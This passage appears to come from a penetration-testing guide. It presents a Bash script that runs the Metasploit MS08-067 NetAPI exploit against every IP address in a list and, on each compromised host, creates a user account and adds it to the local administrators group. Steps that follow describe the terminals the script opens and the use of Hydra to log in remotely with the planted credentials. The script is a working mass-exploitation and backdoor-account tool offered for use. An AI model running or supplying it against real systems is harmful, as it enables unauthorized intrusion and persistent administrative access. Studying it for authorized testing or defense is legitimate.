The example that follows demonstrates how a Bash script can be used to exploit multiple instances of a single vulnerability simultaneously. This script in particular can be used to exploit multiple instances of the MS08-067 NetAPI vulnerability by referencing an input list 
of IP addresses:

#!/bin/bash

if [ ! $1 ]; then echo "Usage: #./script <host file> <username>
<password>"; 
exit; fi

iplist=$1
user=$2
pass=$3

for ip in $(cat $iplist)
do
gnome-terminal -x msfconsole -x
"use exploit/windows/smb/ms08_067_netapi; set RHOST $ip;
 set PAYLOAD windows/exec; set CMD cmd.exe /c net user
 $user $pass add && net localgroup administrators $user add;
 run"
echo "Exploiting $ip and adding user $user"
i=$(($i+1))
done

1. This script is different from the previous multithreaded exploitation scripts because of the payload.
2. In this case, two sequential commands are executed upon successful exploitation. The first of these two commands creates a new user account named hutch and defines the associated password. The second command adds the newly created user account to the local administrators group:

3. If the script is executed without supplying any arguments, the script will output the appropriate usage. This usage description will indicate that the script should be executed with an argument specifying the filename for a text file containing a list of target IP addresses.
4. Once executed with this argument, a series of new terminals will begin popping up. Each of these terminals will run the exploitation sequence of one of the IP addresses in the input list.
5. The original execution terminal will output a list of processes as they are executed and indicate that the new user account will be added on each. After the exploitation sequence has completed in each terminal, the system can then be accessed by integrated terminal services such as RDP or via remote SMB authentication.
6. To demonstrate that the account was added, Hydra is used to remotely log in to an exploited system using the newly added credentials:

7. Hydra indicates that the login with the newly created credentials was successful. This newly created account can then be used for further nefarious purposes, or a script could be used to test for the presence of the account to be used for validating the exploitation of vulnerabilities.